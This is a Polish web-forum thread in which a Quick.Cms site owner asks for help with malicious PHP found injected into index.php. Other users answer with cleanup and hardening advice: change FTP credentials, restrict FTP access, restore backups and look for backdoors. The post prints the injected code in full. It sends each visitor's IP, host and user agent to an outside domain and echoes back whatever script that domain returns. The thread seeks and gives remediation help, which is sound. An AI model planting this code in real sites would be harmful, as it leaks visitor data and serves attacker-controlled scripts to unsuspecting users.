Złośliwy kod w pliku index.php

targi.com.pl

Avatar: targi.com.pl

2014-01-16 10:25

witam,
mam taki problem - znalazłem kod nadpisy do pliku index.php

<?php
#37427d#
error_reporting(0); ini_set('display_errors',0); $wp_sbci45 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_sbci45) && !preg_match ('/bot/i', $wp_sbci45))){
$wp_sbci0945="http://"."html"."-title".".com/title"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_sbci45);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_sbci0945);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_45sbci = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_45sbci,1,3) === 'scr' ){ echo $wp_45sbci; }
#/37427d#
?>

Nie znam na tyle php zebym sie polapal co to jest, interesuje mnie glownie kwestia czy poza tym plikiem cos jeszcze moze byc zaatakowane z plikow qiuck.cms-a.
Wywaliłem to z pliku index i zastanawiam sie co dalej...

» Quick.Cms v4.x

Max

openzibi

Avatar: openzibi

2014-01-16 12:18

1. Zmień hasło do FTP
2. http://opensolution.org/jak-zabezpieczyc-twoja-strone-i-dane-twoich-klientow-,pl,202.html
3. Tu jest wzmianka o twoim kodzie: http://www.php.de/php-fortgeschrittene/105276-hackerangriff-bei-1und1.html
4. Sprawdż wszystkie pliki index.php oraz np. po dacie zmiany zerkij na inne

StudioStrona - rhh.pl

treewood (OpenSolution)

Avatar: treewood

2014-01-16 14:41

NIE TRZYMAJ HASŁA FTP W PROGRAMIE typu FileZilla, Total Commander itp. Ogranicz dostęp do FTP tylko z Twojego IP. Porządne hostingi to mają, tylko pytanie czy masz porządny hosting.

Data zmiany pliku to mylna sprawa. Mogę w każdej chwili utworzyć plik i go zmodyfikować i ustawić mu datę na 13 grudnia 1981. Najbezpieczniej przywrócić kopię zapasową jeśli taką posiadasz na swoim komputerze. Możesz mieć umieszczone pliki typu "backdoor", których odnalezienie będzie czasochłonne i przy braku wiedzy ciężkie.

Koniecznie przeczytaj to: http://opensolution.org/jak-zabezpieczyc-twoja-strone-i-dane-twoich-klientow-,pl,202.html#2

Włamania to najczęściej zaniedbania od strony wykonawcy strony, którzy po fakcie reagują i mówią "o kurcze, nie wiedziałem, że to może mieć wpływ na bezpieczeństwo ..."

Do góry
o nas | kontakt